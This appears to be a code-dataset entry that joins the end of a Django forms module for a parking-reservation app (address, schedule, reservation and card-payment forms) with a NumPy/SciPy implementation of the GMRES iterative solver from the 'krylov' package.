direccion = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Dirección'}))
telefono1 = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Teléfono 1',}))
telefono2 = forms.IntegerField(widget=forms.TextInput(
        attrs={'class': 'form-control', 'placeholder': 'Teléfono 2',}), required=False)
telefono3 = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Teléfono 3',}), required=False)
email1 = forms.EmailField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Correo Electrónico 1',}))
email2 = forms.EmailField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Correo Electrónico 2',}), required=False)
email3 = forms.EmailField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Correo Electrónico 3',}), required=False)
rif = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'RIF',}))
capacidad = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Capacidad',}))
tarifa = forms.DecimalField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Tarifa',}))
horaI = forms.TimeField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Hora Apertura',}))
horaF = forms.TimeField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Hora Cierre',}))
reservaI = forms.TimeField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Inicio Restringir Reserva',}), required=False)
reservaF = forms.TimeField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Fin Restringir Reserva',}), required=False)
class Meta:
model = Estacionamiento
fields = '__all__'
class ReservaForm(forms.ModelForm):
estacionamiento = forms.ModelChoiceField(
queryset=Estacionamiento.objects.all(),
empty_label="Estacionamiento",
widget=forms.Select(attrs={'class': 'form-control',}))
horaInicio = forms.TimeField(widget=forms.DateInput(
attrs={'class': 'form-control', 'placeholder': 'Inicio de la Reserva',}))
horaFin = forms.TimeField(widget=forms.DateInput(
attrs={'class': 'form-control', 'placeholder': 'Fin de la Reserva',}))
class Meta:
model = Reserva
fields = ['horaInicio', 'horaFin', 'estacionamiento']
class PagoForm(forms.ModelForm):
TARJETAS = [
('', 'Tipo de Tarjeta'),
('Vista', 'Vista'),
('Mister', 'Mister'),
('Xpres', 'Xpres')
]
nombre = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Nombre',}))
cedula = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Cédula',}))
tipoTarjeta = forms.ChoiceField(choices=TARJETAS, widget=forms.Select(attrs={'class': 'form-control'}))
numeroTarjeta = forms.RegexField(min_length=16, max_length=16, regex=r'^(\d)+$',
error_message = ("Número de tarjeta no válido."), widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Número de Tarjeta',}))
class Meta:
model = Pago
fields = ['nombre', 'cedula', 'tipoTarjeta', 'numeroTarjeta', 'pago']
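# Usage sketch (not part of the original module): validating a card payment
# the way a view would; the 'pago' value is whatever the Pago model expects.
#
#     form = PagoForm(data={'nombre': 'Ana', 'cedula': 12345678,
#                           'tipoTarjeta': 'Vista',
#                           'numeroTarjeta': '1234567890123456',
#                           'pago': ...})
#     form.is_valid()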
| 2.046875 | 2 |
src/krylov/gmres.py | nschloe/krylov | 36 | 11099 | <gh_stars>10-100
"""
<NAME>, <NAME>,
GMRES: a generalized minimal residual algorithm for solving nonsymmetric linear systems,
SIAM J. Sci. and Stat. Comput., 7(3), 856–869, 1986,
<https://doi.org/10.1137/0907058>.
Other implementations:
<https://petsc.org/release/docs/manualpages/KSP/KSPGMRES.html>
"""
from __future__ import annotations
from typing import Callable
import numpy as np
import scipy.linalg
from numpy.typing import ArrayLike
from ._helpers import (
Identity,
Info,
LinearOperator,
Product,
assert_correct_shapes,
clip_imag,
get_default_inner,
wrap_inner,
)
from .arnoldi import ArnoldiHouseholder, ArnoldiMGS
from .givens import givens
def multi_matmul(A, b):
"""A @ b for many A, b (i.e., A.shape == (m,n,...), y.shape == (n,...))"""
return np.einsum("ij...,j...->i...", A, b)
def multi_solve_triangular(A, B):
"""This function calls scipy.linalg.solve_triangular for every single A. A
vectorized version would be much better here.
"""
A_shape = A.shape
a = A.reshape(A.shape[0], A.shape[1], -1)
b = B.reshape(B.shape[0], -1)
y = []
for k in range(a.shape[2]):
if np.all(b[:, k] == 0.0):
y.append(np.zeros(b[:, k].shape))
else:
y.append(scipy.linalg.solve_triangular(a[:, :, k], b[:, k]))
y = np.array(y).T.reshape([A_shape[0]] + list(A_shape[2:]))
return y
def gmres(
*args,
restart_size: int | None = None,
maxiter: int | None = None,
x0: ArrayLike | None = None,
**kwargs,
) -> tuple[np.ndarray | None, Info]:
if restart_size is None:
return _gmres(*args, maxiter=maxiter, x0=x0, **kwargs)
total_steps = 0
info = None
while True:
sol, info = _gmres(
*args,
maxiter=restart_size
if maxiter is None
else min(restart_size, maxiter - total_steps),
x0=x0 if info is None else info.xk,
**kwargs,
)
total_steps += info.numsteps
if info.success:
break
# override numsteps
info = Info(info.success, info.xk, total_steps, info.resnorms, info.nresnorms)
return sol, info
def _gmres(
A: LinearOperator,
b: ArrayLike,
M: LinearOperator | None = None,
Ml: LinearOperator | None = None,
Mr: LinearOperator | None = None,
inner: Callable | None = None,
ortho: str = "mgs",
x0: ArrayLike | None = None,
tol: float = 1e-5,
atol: float = 1.0e-15,
maxiter: int | None = None,
callback: Callable[[int, np.ndarray, list[np.ndarray]], None] | None = None,
) -> tuple[np.ndarray | None, Info]:
b = np.asarray(b)
assert_correct_shapes(A, b, x0)
n = A.shape[0]
M = Identity(n) if M is None else M
Ml = Identity(n) if Ml is None else Ml
Mr = Identity(n) if Mr is None else Mr
def _get_xk(y):
if y is None:
return x0
k = arnoldi.iter
if k > 0:
yy = multi_solve_triangular(R[:k, :k], y)
# The last is always 0, so we could skip it, too
# yk = sum(c * v for c, v in zip(yy, V[:-1]))
yk = sum(c * v for c, v in zip(yy, arnoldi.V))
return x0 + Mr @ yk
return x0
_inner = get_default_inner(b.shape) if inner is None else wrap_inner(inner)
maxiter = A.shape[0] if maxiter is None else maxiter
if x0 is None:
x0 = np.zeros_like(b)
Ml_r0 = Ml @ b
else:
x0 = np.asarray(x0)
Ml_r0 = Ml @ (b - A @ x0)
M_Ml_r0 = M @ Ml_r0
M_Ml_r0_norm = np.sqrt(clip_imag(_inner(Ml_r0, M_Ml_r0)))
Ml_A_Mr = Product(Ml, A, Mr)
resnorms = [M_Ml_r0_norm]
if callback is not None:
callback(0, x0, resnorms)
# initialize Arnoldi
if ortho.startswith("mgs"):
num_reorthos = 1 if len(ortho) == 3 else int(ortho[3:])
arnoldi = ArnoldiMGS(
Ml_A_Mr,
Ml_r0,
num_reorthos=num_reorthos,
M=M,
Mv=M_Ml_r0,
Mv_norm=M_Ml_r0_norm,
inner=_inner,
)
else:
assert ortho == "householder"
assert inner is None
assert isinstance(M, Identity)
arnoldi = ArnoldiHouseholder(Ml_A_Mr, Ml_r0)
# Givens rotations:
G = []
# QR decomposition of Hessenberg matrix via Givens and R
dtype = M_Ml_r0.dtype
R = np.zeros([maxiter + 1, maxiter] + list(b.shape[1:]), dtype=dtype)
y = np.zeros([maxiter + 1] + list(b.shape[1:]), dtype=dtype)
# Right-hand side of projected system:
y[0] = M_Ml_r0_norm
yk = None
xk = None
# iterate Arnoldi
k = 0
success = False
reason = None
criterion = np.maximum(tol * resnorms[0], atol)
while True:
if np.all(resnorms[-1] <= criterion):
# oh really?
xk = _get_xk(yk) if xk is None else xk
Ml_r = Ml @ (b - A @ xk)
resnorms[-1] = np.sqrt(clip_imag(_inner(Ml_r, M @ Ml_r)))
if np.all(resnorms[-1] <= criterion):
success = True
break
if k == maxiter:
reason = "maxiter reached"
break
# V is used in _get_xk()
_, h = next(arnoldi)
# Copy new column from Arnoldi
R[: k + 2, k] = h[: k + 2]
# Apply previous Givens rotations.
for i in range(k):
R[i : i + 2, k] = multi_matmul(G[i], R[i : i + 2, k])
# Compute and apply new Givens rotation.
g, r = givens(R[k : k + 2, k])
G.append(g)
R[k, k] = r
R[k + 1, k] = 0.0
y[k : k + 2] = multi_matmul(G[k], y[k : k + 2])
yk = y[: k + 1]
resnorm = np.abs(y[k + 1])
xk = None
if callback is not None:
xk = _get_xk(yk) if xk is None else xk
callback(k + 1, xk, resnorms)
resnorms.append(resnorm)
k += 1
# compute solution if not yet done
if xk is None:
xk = _get_xk(y[: arnoldi.iter])
return xk if success else None, Info(
success, xk, k, np.array(resnorms), reason=reason
)
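if __name__ == "__main__":
    # Self-check sketch (not part of the library): solve a small dense SPD
    # system and confirm the reported residual norm drops below the tolerance.
    # Assumes the helpers in ._helpers accept plain ndarrays, as the public
    # krylov API does; run via `python -m krylov.gmres` so the relative
    # imports resolve.
    A = np.diag([3.0, 2.0, 1.0])
    b = np.ones(3)
    sol, info = gmres(A, b, tol=1e-10)
    print(info.success, info.resnorms[-1])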
| 2.71875 | 3 |